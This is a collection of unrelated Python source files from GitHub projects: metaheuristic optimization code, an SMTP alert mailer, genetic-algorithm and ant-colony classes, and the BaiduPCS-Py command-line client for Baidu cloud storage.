id_best_intennsity = np.argmax(intensity_receive)
pop_new = []
for idx in range(0, self.pop_size):
agent = deepcopy(self.pop[idx])
if self.pop[id_best_intennsity][self.ID_INT] > self.pop[idx][self.ID_INT]:
agent[self.ID_TARGET_POS] = self.pop[id_best_intennsity][self.ID_TARGET_POS]
if np.random.uniform() > self.p_c: ## changing mask
agent[self.ID_MASK] = np.where(np.random.uniform(0, 1, self.problem.n_dims) < self.p_m, 0, 1)
pos_new = np.where(self.pop[idx][self.ID_MASK] == 0, self.pop[idx][self.ID_TARGET_POS],
self.pop[np.random.randint(0, self.pop_size)][self.ID_POS])
## Perform random walk
pos_new = self.pop[idx][self.ID_POS] + np.random.normal() * \
(self.pop[idx][self.ID_POS] - self.pop[idx][self.ID_PREV_MOVE_VEC]) + \
(pos_new - self.pop[idx][self.ID_POS]) * np.random.normal()
agent[self.ID_POS] = self.amend_position_faster(pos_new)
pop_new.append(agent)
pop_new = self.update_fitness_population(pop_new)
for idx in range(0, self.pop_size):
if self.compare_agent(pop_new[idx], self.pop[idx]):
self.pop[idx][self.ID_PREV_MOVE_VEC] = pop_new[idx][self.ID_POS] - self.pop[idx][self.ID_POS]
self.pop[idx][self.ID_INT] = np.log(1. / (abs(pop_new[idx][self.ID_FIT][self.ID_TAR]) + self.EPSILON) + 1)
self.pop[idx][self.ID_POS] = pop_new[idx][self.ID_POS]
self.pop[idx][self.ID_FIT] = pop_new[idx][self.ID_FIT]
# class OriginalSSA(Root):
# """
# The original version of: Social Spider Algorithm (SSA)
# (Social Spider Algorithm - A social spider algorithm for global optimization)
# Link:
# + Taken from Github: https://github.com/James-Yu/SocialSpiderAlgorithm
# + Slow convergence
# """
#
# def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
# r_a=1, p_c=0.7, p_m=0.1, **kwargs):
# super().__init__(obj_func, lb, ub, verbose, kwargs)
# self.epoch = epoch
# self.pop_size = pop_size
# self.r_a = r_a # the rate of vibration attenuation when propagating over the spider web.
# self.p_c = p_c # controls the probability of the spiders changing their dimension mask in the random walk step.
# self.p_m = p_m # the probability of each value in a dimension mask to be one
#
# def train(self):
#
# g_best = [np.zeros(self.problem_size), np.Inf]
# self.position = np.random.uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
# target_position = deepcopy(self.position)
# target_intensity = np.zeros(self.pop_size)
# mask = np.zeros((self.pop_size, self.problem_size))
# movement = np.zeros((self.pop_size, self.problem_size))
# inactive = np.zeros(self.pop_size)
#
# epoch = 0
# while (epoch < self.epoch):
# epoch += 1
# spider_fitness = np.array([self.get_fitness_position(self.position[i]) for i in range(self.pop_size)])
# base_distance = np.mean(np.std(self.position, 0))
# distance = cdist(self.position, self.position, 'euclidean')
#
# intensity_source = np.log(1. / (spider_fitness + self.EPSILON) + 1)
# intensity_attenuation = np.exp(-distance / (base_distance * self.r_a))
# intensity_receive = np.tile(intensity_source, self.pop_size).np.reshape(self.pop_size, self.pop_size) * intensity_attenuation
#
# max_index = np.argmax(intensity_receive, axis=1)
# keep_target = intensity_receive[np.arange(self.pop_size), max_index] <= target_intensity
# keep_target_matrix = np.repeat(keep_target, self.problem_size).np.reshape(self.pop_size, self.problem_size)
# inactive = inactive * keep_target + keep_target
# target_intensity = target_intensity * keep_target + intensity_receive[np.arange(self.pop_size), max_index] * (1 - keep_target)
# target_position = target_position * keep_target_matrix + self.position[max_index] * (1 - keep_target_matrix)
#
# rand_position = self.position[np.floor(rand(self.pop_size * self.problem_size) * self.pop_size).astype(int), \
# np.tile(np.arange(self.problem_size), self.pop_size)].np.reshape(self.pop_size, self.problem_size)
# new_mask = np.ceil(rand(self.pop_size, self.problem_size) + rand() * self.p_m - 1)
# keep_mask = rand(self.pop_size) < self.p_c ** inactive
# inactive = inactive * keep_mask
# keep_mask_matrix = np.repeat(keep_mask, self.problem_size).np.reshape(self.pop_size, self.problem_size)
# mask = keep_mask_matrix * mask + (1 - keep_mask_matrix) * new_mask
#
# follow_position = mask * rand_position + (1 - mask) * target_position
# movement = np.repeat(rand(self.pop_size), self.problem_size).np.reshape(self.pop_size, self.problem_size) * movement + \
# (follow_position - self.position) * rand(self.pop_size, self.problem_size)
# self.position = self.position + movement
#
# if min(spider_fitness) < g_best[self.ID_FIT]:
# g_best = deepcopy([self.position[argmin(spider_fitness)]), min(spider_fitness)]
#
# self.loss_train.append(g_best[self.ID_FIT])
# if self.verbose:
# print("> Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
# self.solution = g_best
# return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
``` |
{
"source": "JokerHB/ServerMonitor",
"score": 3
} |
#### File: JokerHB/ServerMonitor/Email.py
```python
import smtplib
import copy
import time
import Loger
import Configure
from email.mime.text import MIMEText
from email.header import Header
from email.utils import parseaddr, formataddr
class Email(object):
# sender predefine
# region
sender = ''
mail_host = ''
mail_user = ''
mail_pass = ''
# endregion
def __init__(self, receiver = None):
# config = Configure.Configure('./config.xml')
# self.logger = Loger.Loger(config.getLogFilePath())
if receiver is None:
self.receivers = []
else:
self.receivers = copy.deepcopy(receiver)
def sendBaseMail(self, content, receiver, logger):
msg = MIMEText(_text=content, _subtype='plain', _charset='utf-8')
msg['From'] = self.addressFormat('Server Alert <%s>' % self.sender)
msg['To'] = self.addressFormat('Admin <%s>' % receiver)
msg['Subject'] = Header('Server Alert', 'utf-8').encode()
msg['date'] = time.strftime('%a, %d %b %Y %H:%M:%S %z')
try:
smtpObj = smtplib.SMTP()
smtpObj.connect(self.mail_host, 25)
# smtpObj.set_debuglevel(1)
smtpObj.login(self.mail_user, self.mail_pass)
smtpObj.sendmail(self.sender, receiver, msg.as_string())
smtpObj.quit()
except:
# print 'send %s failed' % receiver
logger.log_Error('EMAIL_SEND_FAILED %s' % receiver)
def sendMails(self, content, receivers, logger):
for recv in receivers:
self.sendBaseMail(content, recv, logger)
def addressFormat(self, add):
name, address = parseaddr(add)
return formataddr((Header(name, 'utf-8').encode(), address))
def setBaseInfo(self, info):
self.mail_host = info.host
self.mail_pass = info.password
self.mail_user = info.user
self.sender = info.sender
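# Illustrative usage sketch (the address, content and `info`/`logger` objects below are
# placeholders; `info` is expected to expose host/user/password/sender as read above):
# mailer = Email(receiver=['admin@example.com'])
# mailer.setBaseInfo(info)
# mailer.sendMails('disk usage above 90%', mailer.receivers, logger)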
``` |
{
"source": "JokerHB/SingleDispatch",
"score": 3
} |
#### File: SingleDispatch/HeredityPart/Heredity.py
```python
import HeredityPart.Corss as hpc
import HeredityPart.Individual as hpi
import HeredityPart.Modules as hpm
from functools import cmp_to_key
from copy import deepcopy
from random import choice
class Heredity(object):
def __init__(self, jobs, mach,crossRate = 0.9, abnormalRate = 1.0, times = 10, indiNum = 100):
"""
init the heredity algorithm
:param jobs: whole job sequence
:param mach: the match of job and machine
:param crossRate: the rate of the cross operation
:param abnormalRate: the rate of the abnormal operation
:param times: the iter time
:param indiNum: individual number
"""
self.CRate = crossRate
self.ARate = abnormalRate
self.times = times
self.indiNum = indiNum
self.individuals = []
self.randomInit(jobs, mach)
def run(self):
for i in range(self.times):
# evaluate
for id in self.individuals:
try:
id.Evaluate()
except Exception as e:
print('error_run_23 ' + str(e))
# cross and abnormal
self.individuals.sort(key=cmp_to_key(hpm.cmp))
pos = int(len(self.individuals) * self.CRate)
if pos == len(self.individuals):
pos -= 1
if len(self.individuals) == 0:
print('error')
_cross = hpm.getRange(self.individuals, 0, pos)
_abnormal = hpm.getRange(self.individuals, pos, len(self.individuals))
new_cross = []
for j in range(0, len(_cross), 2):
try:
if j == len(_cross) - 1:
a, b = hpc.DoCorss(_cross[j], _cross[j])
new_cross.append(a)
new_cross.append(b)
break
a,b = hpc.DoCorss(_cross[j], _cross[j + 1])
new_cross.append(a)
new_cross.append(b)
except Exception as e:
print('error_heredity_46 ' + str(e))
for j in _abnormal:
j.Abnormal(self.ARate)
for _ in _abnormal:
new_cross.append(_)
self.individuals = new_cross
def randomInit(self, job, match):
for i in range(self.indiNum):
_job = deepcopy(job)
ranJob = []
for __ in range(len(job)):
___ = choice(_job)
ranJob.append(___)
_job.remove(___)
_ = hpi.Individual(job = deepcopy(ranJob), mach=deepcopy(match))
self.individuals.append(_)
def output(self):
self.individuals.sort(key=cmp_to_key(hpm.cmp))
self.individuals[0].display()
def getBest(self):
return self.individuals[0]
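# Illustrative usage sketch (jobs/match are placeholders in whatever structure
# HeredityPart.Individual expects):
# ga = Heredity(jobs, match, crossRate=0.9, abnormalRate=1.0, times=50, indiNum=100)
# ga.run()
# best = ga.getBest()
# ga.output()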
``` |
{
"source": "JokerHB/XY",
"score": 3
} |
#### File: XY/ACO/Ants.py
```python
import os
import Simulate
from copy import deepcopy
from random import randint
from random import choice
class Ants(object):
def __init__(self, graph, alpha, beta):
'''
init function of Ants
'''
self._graph = deepcopy(graph)
self._alpha = alpha
self._beta = beta
self._length = randint(1, len(self._graph._edge))
self._currentPoint = choice(self._graph._edge)._startPoint
self._path = [self._currentPoint]
self._value = 0.0
def MoveToNextEdge(self):
for i in range(1, self._length):
node = -1
p = -1
edge = None
for e in self._graph._edge:
if node == -1:
p = (e._pheromone ** self._alpha) * (e._display ** self._beta)
node = e._endPoint
edge = e
elif e._startPoint == self._currentPoint and e._endPoint not in self._path:
if (e._pheromone ** self._alpha) * (e._display ** self._beta) > p:
p = e._pheromone
node = e._endPoint
edge = e
if edge is not None:
self._path.append(node)
self._currentPoint = node
self._graph._edge.remove(edge)
else:
break
# self._graph.UpdateDegree()
self._value = self._graph.GetModularity()
def ResetAnt(self, graph, alpha, beta):
self._graph = deepcopy(graph)
self._alpha = alpha
self._beta = beta
self._length = randint(1, len(self._graph._edge))
self._currentPoint = choice(self._graph._edge)._startPoint
self._path = [self._currentPoint]
self._value = 0.0
def IsPassEdge(self, startPoint, endPoint):
if startPoint not in self._path or endPoint not in self._path:
return False
sp = self._path.index(startPoint)
ep = self._path.index(endPoint)
if abs(sp - ep) == 1:
return True
return False
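# Illustrative usage sketch (assumes a graph object exposing _edge and GetModularity(),
# as used by the methods above):
# ant = Ants(graph, alpha=1.0, beta=2.0)
# ant.MoveToNextEdge()
# print(ant._path, ant._value)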
``` |
{
"source": "joker-i5700/BaiduPCS-Py",
"score": 2
} |
#### File: baidupcs_py/app/app.py
```python
from typing import Optional
from collections import OrderedDict
from functools import wraps
import os
import signal
from pathlib import Path
from baidupcs_py import __version__
from baidupcs_py.baidupcs import BaiduPCSApi, BaiduPCSError
from baidupcs_py.app.account import Account, AccountManager, DEFAULT_DATA_PATH
from baidupcs_py.common.progress_bar import _progress
from baidupcs_py.common.path import join_path
from baidupcs_py.commands.sifter import (
IncludeSifter,
ExcludeSifter,
IsFileSifter,
IsDirSifter,
)
from baidupcs_py.commands.display import display_user_info, display_user_infos
from baidupcs_py.commands.list_files import list_files
from baidupcs_py.commands.cat import cat as _cat
from baidupcs_py.commands import file_operators
from baidupcs_py.commands.search import search as _search
from baidupcs_py.commands import cloud as _cloud
from baidupcs_py.commands.download import (
download as _download,
Downloader,
DownloadParams,
DEFAULT_DOWNLOADER,
DEFAULT_CONCURRENCY,
DEFAULT_CHUNK_SIZE,
)
from baidupcs_py.commands.play import play as _play, Player, DEFAULT_PLAYER
from baidupcs_py.commands.upload import upload as _upload, from_tos, CPU_NUM
from baidupcs_py.commands.sync import sync as _sync
from baidupcs_py.commands import share as _share
import click
from rich import print
from rich.prompt import Prompt, Confirm
from rich.console import Console
DEBUG = os.getenv("DEBUG")
def handle_signal(sign_num, frame):
if _progress._started:
print()
# Stop _progress, otherwise terminal stdout will be contaminated
_progress.stop()
# No use sys.exit() which only exits the main thread
os._exit(1)
signal.signal(signal.SIGINT, handle_signal)
def handle_error(func):
"""Handle command error wrapper"""
@wraps(func)
def wrap(*args, **kwargs):
try:
return func(*args, **kwargs)
except BaiduPCSError as err:
print(f"(v{__version__}) [bold red]ERROR[/bold red]: BaiduPCSError: {err}")
if DEBUG:
console = Console()
console.print_exception()
except Exception as err:
print(f"(v{__version__}) [bold red]System ERROR[/bold red]: {err}")
if DEBUG:
console = Console()
console.print_exception()
return wrap
def _recent_api(ctx) -> Optional[BaiduPCSApi]:
"""Return recent user's `BaiduPCSApi`"""
am = ctx.obj.account_manager
account = am.who()
if not account:
print("[italic red]No recent user, please adding or selecting one[/]")
return None
return account.pcsapi()
def _pwd(ctx) -> Path:
"""Return recent user's pwd"""
am = ctx.obj.account_manager
return Path(am.pwd)
ALIAS = OrderedDict(
**{
"w": "who",
"uu": "updateuser",
"su": "su",
"ul": "userlist",
"ua": "useradd",
"ud": "userdel",
"l": "ls",
"f": "search",
"md": "mkdir",
"mv": "move",
"rn": "rename",
"cp": "copy",
"rm": "remove",
"d": "download",
"p": "play",
"u": "upload",
"sn": "sync",
"S": "share",
"sl": "shared",
"cs": "cancelshared",
"s": "save",
"a": "add",
"t": "tasks",
"ct": "cleartasks",
"cct": "canceltasks",
}
)
class AliasedGroup(click.Group):
def get_command(self, ctx, cmd_name):
# As normal command name
rv = click.Group.get_command(self, ctx, cmd_name)
if rv is not None:
return rv
# Check alias command name
if cmd_name not in ALIAS:
ctx.fail(f"No command: {cmd_name}")
normal_cmd_name = ALIAS[cmd_name]
return click.Group.get_command(self, ctx, normal_cmd_name)
def list_commands(self, ctx):
return self.commands
_APP_DOC = f"""BaiduPCS App v{__version__}
\b
如果第一次使用,你需要运行 `BaiduPCS-Py useradd` 添加 `bduss` 和 `cookies`。
如何获取 `bduss` 和 `cookies` 见 https://github.com/PeterDing/BaiduPCS-Py#%E6%B7%BB%E5%8A%A0%E7%94%A8%E6%88%B7
用 `BaiduPCS-Py {{command}} --help` 查看具体的用法。"""
_ALIAS_DOC = "Command 别名:\n\n\b\n" + "\n".join(
[f"{alias: >3} : {cmd}" for alias, cmd in ALIAS.items()]
)
@click.group(cls=AliasedGroup, help=_APP_DOC, epilog=_ALIAS_DOC)
@click.option(
"--account-data", type=str, default=DEFAULT_DATA_PATH, help="Account data file"
)
@click.pass_context
def app(ctx, account_data):
ctx.obj.account_manager = AccountManager.load_data(account_data)
# Account
# {{{
@app.command()
@click.argument("user_id", type=int, default=None, required=False)
@click.pass_context
@handle_error
def who(ctx, user_id):
"""显示当前用户的信息
也可指定 `user_id`
"""
am = ctx.obj.account_manager
account = am.who(user_id)
if account:
display_user_info(account.user)
else:
print("[italic red]No recent user, please adding or selecting one[/]")
@app.command()
@click.argument("user_ids", type=int, nargs=-1, default=None, required=False)
@click.pass_context
@handle_error
def updateuser(ctx, user_ids):
"""更新用户信息 (默认更新当前用户信息)
也可指定多个 `user_id`
"""
am = ctx.obj.account_manager
if not user_ids:
user_ids = [am._who]
for user_id in user_ids:
am.update(user_id)
account = am.who(user_id)
display_user_info(account.user)
am.save()
@app.command()
@click.pass_context
@handle_error
def su(ctx):
"""切换当前用户"""
am = ctx.obj.account_manager
ls = sorted([(a.user, a.pwd) for a in am.accounts])
display_user_infos(*ls, recent_user_id=am._who)
indexes = list(str(idx) for idx in range(1, len(ls) + 1))
i = Prompt.ask("Select an user index", choices=indexes, default="")
if not i:
return
user_id = ls[int(i) - 1][0].user_id
am.su(user_id)
am.save()
@app.command()
@click.pass_context
@handle_error
def userlist(ctx):
"""显示所有用户"""
am = ctx.obj.account_manager
ls = sorted([(a.user, a.pwd) for a in am.accounts])
display_user_infos(*ls, recent_user_id=am._who)
@app.command()
@click.option("--bduss", prompt="bduss", hide_input=True, help="用户 bduss")
@click.option(
"--cookies", prompt="cookies", hide_input=True, default="", help="用户 cookies"
)
@click.pass_context
@handle_error
def useradd(ctx, bduss, cookies):
"""添加一个用户并设置为当前用户"""
if cookies:
cookies = dict([c.split("=", 1) for c in cookies.split("; ")])
else:
cookies = {}
account = Account.from_bduss(bduss, cookies=cookies)
am = ctx.obj.account_manager
am.useradd(account.user)
am.su(account.user.user_id)
am.save()
@app.command()
@click.pass_context
@handle_error
def userdel(ctx):
"""删除一个用户"""
am = ctx.obj.account_manager
ls = sorted([(a.user, a.pwd) for a in am.accounts])
display_user_infos(*ls, recent_user_id=am._who)
indexes = list(str(idx) for idx in range(1, len(ls) + 1))
i = Prompt.ask("Delete an user index", choices=indexes, default="")
if not i:
return
user_id = ls[int(i) - 1][0].user_id
am.userdel(user_id)
am.save()
print(f"Delete user {user_id}")
@app.command()
@click.argument("remotedir", type=str, default="/", required=False)
@click.pass_context
@handle_error
def cd(ctx, remotedir):
"""切换当前工作目录"""
am = ctx.obj.account_manager
am.cd(remotedir)
am.save()
@app.command()
@click.pass_context
@handle_error
def pwd(ctx):
"""显示当前工作目录"""
pwd = _pwd(ctx)
print(pwd)
# }}}
# Files
# {{{
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--desc", "-r", is_flag=True, help="逆序排列文件")
@click.option("--name", "-n", is_flag=True, help="依名字排序")
@click.option("--time", "-t", is_flag=True, help="依时间排序")
@click.option("--size", "-s", is_flag=True, help="依文件大小排序")
@click.option("--recursive", "-R", is_flag=True, help="递归列出文件")
@click.option("--include", "-I", type=str, help="筛选包含这个字符串的文件")
@click.option("--include-regex", "--IR", type=str, help="筛选包含这个正则表达式的文件")
@click.option("--exclude", "-E", type=str, help="筛选 不 包含这个字符串的文件")
@click.option("--exclude-regex", "--ER", type=str, help="筛选 不 包含这个正则表达式的文件")
@click.option("--is-file", "-f", is_flag=True, help="筛选 非 目录文件")
@click.option("--is-dir", "-d", is_flag=True, help="筛选目录文件")
@click.option("--no-highlight", "--NH", is_flag=True, help="取消匹配高亮")
@click.option("--show-size", "-S", is_flag=True, help="显示文件大小")
@click.option("--show-date", "-D", is_flag=True, help="显示文件创建时间")
@click.option("--show-md5", "-M", is_flag=True, help="显示文件md5")
@click.option("--show-absolute-path", "-A", is_flag=True, help="显示文件绝对路径")
@click.pass_context
@handle_error
def ls(
ctx,
remotepaths,
desc,
name,
time,
size,
recursive,
include,
include_regex,
exclude,
exclude_regex,
is_file,
is_dir,
no_highlight,
show_size,
show_date,
show_md5,
show_absolute_path,
):
"""列出网盘路径下的文件"""
api = _recent_api(ctx)
if not api:
return
sifters = []
if include:
sifters.append(IncludeSifter(include, regex=False))
if include_regex:
sifters.append(IncludeSifter(include_regex, regex=True))
if exclude:
sifters.append(ExcludeSifter(exclude, regex=False))
if exclude_regex:
sifters.append(ExcludeSifter(exclude_regex, regex=True))
if is_file:
sifters.append(IsFileSifter())
if is_dir:
sifters.append(IsDirSifter())
pwd = _pwd(ctx)
remotepaths = (join_path(pwd, r) for r in list(remotepaths) or (pwd,))
list_files(
api,
*remotepaths,
desc=desc,
name=name,
time=time,
size=size,
recursive=recursive,
sifters=sifters,
highlight=not no_highlight,
show_size=show_size,
show_date=show_date,
show_md5=show_md5,
show_absolute_path=show_absolute_path,
)
@app.command()
@click.argument("keyword", nargs=1, type=str)
@click.argument("remotedir", nargs=1, type=str, default="")
@click.option("--recursive", "-R", is_flag=True, help="递归搜索文件")
@click.option("--include", "-I", type=str, help="筛选包含这个字符串的文件")
@click.option("--include-regex", "--IR", type=str, help="筛选包含这个正则表达式的文件")
@click.option("--exclude", "-E", type=str, help="筛选 不 包含这个字符串的文件")
@click.option("--exclude-regex", "--ER", type=str, help="筛选 不 包含这个正则表达式的文件")
@click.option("--is-file", "-f", is_flag=True, help="筛选 非 目录文件")
@click.option("--is-dir", "-d", is_flag=True, help="筛选目录文件")
@click.option("--no-highlight", "--NH", is_flag=True, help="取消匹配高亮")
@click.option("--show-size", "-S", is_flag=True, help="显示文件大小")
@click.option("--show-date", "-D", is_flag=True, help="显示文件创建时间")
@click.option("--show-md5", "-M", is_flag=True, help="显示文件md5")
@click.pass_context
@handle_error
def search(
ctx,
keyword,
remotedir,
recursive,
include,
include_regex,
exclude,
exclude_regex,
is_file,
is_dir,
no_highlight,
show_size,
show_date,
show_md5,
):
"""搜索包含 `keyword` 的文件"""
api = _recent_api(ctx)
if not api:
return
sifters = []
if include:
sifters.append(IncludeSifter(include, regex=False))
if include_regex:
sifters.append(IncludeSifter(include_regex, regex=True))
if exclude:
sifters.append(ExcludeSifter(exclude, regex=False))
if exclude_regex:
sifters.append(ExcludeSifter(exclude_regex, regex=True))
if is_file:
sifters.append(IsFileSifter())
if is_dir:
sifters.append(IsDirSifter())
pwd = _pwd(ctx)
remotedir = join_path(pwd, remotedir)
_search(
api,
keyword,
remotedir,
recursive=recursive,
sifters=sifters,
highlight=not no_highlight,
show_size=show_size,
show_date=show_date,
show_md5=show_md5,
)
@app.command()
@click.argument("remotepath", nargs=1, type=str)
@click.option("--encoding", "-e", type=str, help="文件编码,默认自动解码")
@click.pass_context
@handle_error
def cat(ctx, remotepath, encoding):
"""显示文件内容"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotepath = join_path(pwd, remotepath)
_cat(api, remotepath, encoding=encoding)
@app.command()
@click.argument("remotedirs", nargs=-1, type=str)
@click.option("--show", "-S", is_flag=True, help="显示目录")
@click.pass_context
@handle_error
def mkdir(ctx, remotedirs, show):
"""创建目录"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotedirs = (join_path(pwd, d) for d in remotedirs)
file_operators.makedir(api, *remotedirs, show=show)
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--show", "-S", is_flag=True, help="显示结果")
@click.pass_context
@handle_error
def move(ctx, remotepaths, show):
"""移动文件
\b
examples:
move /file1 /file2 /to/dir
"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotepaths = [join_path(pwd, r) for r in remotepaths]
if len(remotepaths) < 2:
ctx.fail("remote paths < 2")
file_operators.move(api, *remotepaths, show=show)
@app.command()
@click.argument("source", nargs=1, type=str)
@click.argument("dest", nargs=1, type=str)
@click.option("--show", "-S", is_flag=True, help="显示结果")
@click.pass_context
@handle_error
def rename(ctx, source, dest, show):
"""文件重命名
\b
examples:
rename /path/to/far /to/here/foo
"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
source = join_path(pwd, source)
dest = join_path(pwd, dest)
file_operators.rename(api, source, dest, show=show)
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--show", "-S", is_flag=True, help="显示结果")
@click.pass_context
@handle_error
def copy(ctx, remotepaths, show):
"""拷贝文件
\b
examples:
copy /file1 /file2 /to/dir
"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotepaths = [join_path(pwd, r) for r in remotepaths]
if len(remotepaths) < 2:
ctx.fail("remote paths < 2")
file_operators.copy(api, *remotepaths, show=show)
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.pass_context
@handle_error
def remove(ctx, remotepaths):
"""删除文件"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotepaths = (join_path(pwd, r) for r in remotepaths)
file_operators.remove(api, *remotepaths)
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--outdir", "-o", nargs=1, type=str, default=".", help="指定下载本地目录,默认为当前目录")
@click.option("--recursive", "-R", is_flag=True, help="递归下载")
@click.option(
"--from-index", "-f", type=int, default=0, help="从所有目录中的第几个文件开始下载,默认为0(第一个)"
)
@click.option("--include", "-I", type=str, help="筛选包含这个字符串的文件")
@click.option("--include-regex", "--IR", type=str, help="筛选包含这个正则表达式的文件")
@click.option("--exclude", "-E", type=str, help="筛选 不 包含这个字符串的文件")
@click.option("--exclude-regex", "--ER", type=str, help="筛选 不 包含这个正则表达式的文件")
@click.option(
"-d",
"--downloader",
type=click.Choice([d.name for d in Downloader]),
default=DEFAULT_DOWNLOADER.name,
help="""指定下载应用
\b
默认为 me (BaiduPCS-Py 自己的下载器,支持断续下载)
me 使用多文件并发下载。
除 me 外,其他下载器,不使用多文件并发下载,使用一个文件多链接下载。
如果需要下载多个小文件推荐使用 me,如果需要下载少量大文件推荐使用其他下载器。
\b
aget_py (https://github.com/PeterDing/aget) 默认安装
aget_rs (下载 https://github.com/PeterDing/aget-rs/releases)
aria2 (下载 https://github.com/aria2/aria2/releases)
""",
)
@click.option(
"--concurrency",
"-s",
type=int,
default=DEFAULT_CONCURRENCY,
help="下载同步链接数,默认为5。数子越大下载速度越快,但是容易被百度封锁",
)
@click.option(
"--chunk-size", "-k", type=str, default=DEFAULT_CHUNK_SIZE, help="同步链接分块大小"
)
@click.option("--quiet", "-q", is_flag=True, help="取消第三方下载应用输出")
@click.option("--out-cmd", "--OC", is_flag=True, help="输出第三方下载应用命令")
@click.pass_context
@handle_error
def download(
ctx,
remotepaths,
outdir,
recursive,
from_index,
include,
include_regex,
exclude,
exclude_regex,
downloader,
concurrency,
chunk_size,
quiet,
out_cmd,
):
"""下载文件"""
if out_cmd:
assert downloader != Downloader.me.name, "输出命令只能用于第三方下载应用"
api = _recent_api(ctx)
if not api:
return
sifters = []
if include:
sifters.append(IncludeSifter(include, regex=False))
if include_regex:
sifters.append(IncludeSifter(include_regex, regex=True))
if exclude:
sifters.append(ExcludeSifter(exclude, regex=False))
if exclude_regex:
sifters.append(ExcludeSifter(exclude_regex, regex=True))
pwd = _pwd(ctx)
remotepaths = [join_path(pwd, r) for r in remotepaths]
_download(
api,
remotepaths,
outdir,
sifters=sifters,
recursive=recursive,
from_index=from_index,
downloader=getattr(Downloader, downloader),
downloadparams=DownloadParams(
concurrency=concurrency, chunk_size=chunk_size, quiet=quiet
),
out_cmd=out_cmd,
)
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--recursive", "-R", is_flag=True, help="递归播放")
@click.option(
"--from-index", "-f", type=int, default=0, help="从所有目录中的第几个文件开始播放,默认为0(第一个)"
)
@click.option("--include", "-I", type=str, help="筛选包含这个字符串的文件")
@click.option("--include-regex", "--IR", type=str, help="筛选包含这个正则表达式的文件")
@click.option("--exclude", "-E", type=str, help="筛选 不 包含这个字符串的文件")
@click.option("--exclude-regex", "--ER", type=str, help="筛选 不 包含这个正则表达式的文件")
@click.option(
"-p",
"--player",
type=click.Choice([d.name for d in Player]),
default=DEFAULT_PLAYER.name,
help="""指定第三方播放器
\b
默认为 mpv (https://mpv.io),
""",
)
@click.option("--player-params", "--PP", multiple=True, type=str, help="第三方播放器参数")
@click.option("--m3u8", "-m", is_flag=True, help="获取m3u8文件并播放")
@click.option("--quiet", "-q", is_flag=True, help="取消第三方播放器输出")
@click.option("--out-cmd", "--OC", is_flag=True, help="输出第三方播放器命令")
@click.pass_context
@handle_error
def play(
ctx,
remotepaths,
recursive,
from_index,
include,
include_regex,
exclude,
exclude_regex,
player,
player_params,
m3u8,
quiet,
out_cmd,
):
"""播放媒体文件"""
api = _recent_api(ctx)
if not api:
return
sifters = []
if include:
sifters.append(IncludeSifter(include, regex=False))
if include_regex:
sifters.append(IncludeSifter(include_regex, regex=True))
if exclude:
sifters.append(ExcludeSifter(exclude, regex=False))
if exclude_regex:
sifters.append(ExcludeSifter(exclude_regex, regex=True))
pwd = _pwd(ctx)
remotepaths = [join_path(pwd, r) for r in remotepaths]
_play(
api,
remotepaths,
sifters=sifters,
recursive=recursive,
from_index=from_index,
player=getattr(Player, player),
player_params=player_params,
m3u8=m3u8,
quiet=quiet,
out_cmd=out_cmd,
)
@app.command()
@click.argument("localpaths", nargs=-1, type=str)
@click.argument("remotedir", nargs=1, type=str)
@click.option("--max-workers", "-w", type=int, default=CPU_NUM, help="同时上传文件数")
@click.option("--no-ignore-existing", "--NI", is_flag=True, help="上传已经存在的文件")
@click.option("--no-show-progress", "--NP", is_flag=True, help="不显示上传进度")
@click.pass_context
@handle_error
def upload(
ctx, localpaths, remotedir, max_workers, no_ignore_existing, no_show_progress
):
"""上传文件"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotedir = join_path(pwd, remotedir)
from_to_list = from_tos(localpaths, remotedir)
_upload(
api,
from_to_list,
max_workers=max_workers,
ignore_existing=not no_ignore_existing,
show_progress=not no_show_progress,
)
@app.command()
@click.argument("localdir", nargs=1, type=str)
@click.argument("remotedir", nargs=1, type=str)
@click.option("--max-workers", "-w", type=int, default=CPU_NUM, help="同时上传文件数")
@click.option("--no-show-progress", "--NP", is_flag=True, help="不显示上传进度")
@click.pass_context
@handle_error
def sync(ctx, localdir, remotedir, max_workers, no_show_progress):
"""同步本地目录到远端"""
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotedir = join_path(pwd, remotedir)
_sync(
api,
localdir,
remotedir,
max_workers=max_workers,
show_progress=not no_show_progress,
)
# }}}
# Share
# {{{
@app.command()
@click.argument("remotepaths", nargs=-1, type=str)
@click.option("--password", "-p", type=str, help="设置秘密,4个字符。默认没有秘密")
@click.pass_context
@handle_error
def share(ctx, remotepaths, password):
"""分享文件
\b
examples:
share /path1 path2
"""
assert not password or len(password) == 4, "`password` must be 4 letters"
api = _recent_api(ctx)
if not api:
return
pwd = _pwd(ctx)
remotepaths = (join_path(pwd, r) for r in remotepaths)
_share.share_files(api, *remotepaths, password=password)
@app.command()
@click.option("--show-all", "-S", is_flag=True, help="显示所有分享的链接,默认只显示有效的分享链接")
@click.pass_context
@handle_error
def shared(ctx, show_all):
"""列出分享链接"""
api = _recent_api(ctx)
if not api:
return
_share.list_shared(api, show_all=show_all)
@app.command()
@click.argument("share_ids", nargs=-1, type=int)
@click.pass_context
@handle_error
def cancelshared(ctx, share_ids):
"""取消分享链接"""
api = _recent_api(ctx)
if not api:
return
_share.cancel_shared(api, *share_ids)
@app.command()
@click.argument("shared_url", nargs=1, type=str)
@click.argument("remotedir", nargs=1, type=str)
@click.option("--password", "-p", type=str, help="链接密码,如果没有不用设置")
@click.option("--no-show-vcode", "--NV", is_flag=True, help="不显示验证码")
@click.pass_context
@handle_error
